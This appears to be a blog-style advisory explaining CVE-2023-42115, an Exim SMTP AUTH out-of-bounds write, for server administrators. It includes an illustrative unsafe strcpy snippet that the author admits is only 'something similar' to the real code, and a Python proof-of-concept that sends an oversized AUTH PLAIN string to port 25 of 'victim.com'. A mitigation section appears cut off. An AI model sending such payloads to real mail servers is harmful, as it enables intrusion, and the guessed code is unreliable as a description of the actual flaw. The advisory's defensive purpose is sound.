CVE-2023-42115 - Exim AUTH Out-Of-Bounds Write Remote Code Execution Exploit – What You Need To Know

A critical vulnerability has been publicly disclosed for Exim, the popular mail transfer agent (MTA) used on millions of servers worldwide. Identified as CVE-2023-42115 (by Zero Day Initiative as ZDI-CAN-17434), this flaw allows unauthenticated remote attackers to execute arbitrary code on affected installations, with no user interaction required.

If your server runs Exim, especially if it’s internet-facing, you need to understand this bug, patch your systems, and consider mitigation steps. Here’s an exclusive, simplified breakdown.

What is CVE-2023-42115?

CVE-2023-42115 is an out-of-bounds write vulnerability in the SMTP service of Exim, typically listening on TCP port 25. Specifically, the bug affects the way Exim handles the AUTH command. It happens when Exim fails to correctly validate data sent by remote clients, allowing an attacker to write data outside the intended buffer.

Impact:
An attacker can exploit it simply by sending a crafted SMTP AUTH command, leading to the possibility of executing code with the privileges of the Exim process. This usually means they gain full control of mail services — a nightmare scenario for mail server admins.

Affected Versions

At the time of writing, affected versions are all current and unpatched releases prior to the fixed versions published by the Exim team. For exact versions and releases, always refer to their official security notices.

Technical Details

Let’s walk through what’s happening under the hood.

When an SMTP client sends the AUTH command, Exim performs a series of steps to process authentication. Due to improper checks, an attacker can craft input that overflows the buffer Exim uses, like so:

AUTH <mechanism> <very-long-user-supplied-string>

In the vulnerable code, something similar to the following occurs

char buf[256];
// ...
strcpy(buf, user_input);  // UNSAFE! No bounds checking

When user_input is longer than 256 bytes, the buffer overflows. The attacker can now write controlled data beyond buf, potentially overwriting important control structures, function pointers, or other data — which, in many cases, can lead to remote code execution.

Note: The vulnerable code may actually use memcpy, strncpy, or similar, but the effect remains the same if bounds are not strictly enforced.

Proof-of-Concept (PoC) – Python Snippet

import socket
import base64

payload = b"A" * 300  # Exceeds the 256-byte buffer
auth_str = "AUTH PLAIN " + base64.b64encode(payload).decode() + "\r\n"

s = socket.socket()
s.connect(("victim.com", 25))
s.recv(1024)
s.sendall(auth_str.encode())
print(s.recv(1024))
s.close()

*Note: Actual exploitation may require more subtle crafting, depending on system memory layout and mitigations, but this demonstrates the attack vector.*

`

2. *Review vendor bulletins and the official Exim security page.*

References and Further Reading

- Zero Day Initiative Advisory
- Exim Official Security History
- NVD Entry for CVE-2023-42115
- Exim GitHub Repo

Conclusion

CVE-2023-42115 is a reminder that essential internet services like mail servers remain high-priority targets for attackers. Buffer overflows, even in mature codebases, can lead to catastrophic breaches. If you run Exim, patch immediately — and review your mail system architecture to minimize the blast radius of any future vulnerabilities.

Timeline

Published on: 05/03/2024 03:15:50 UTC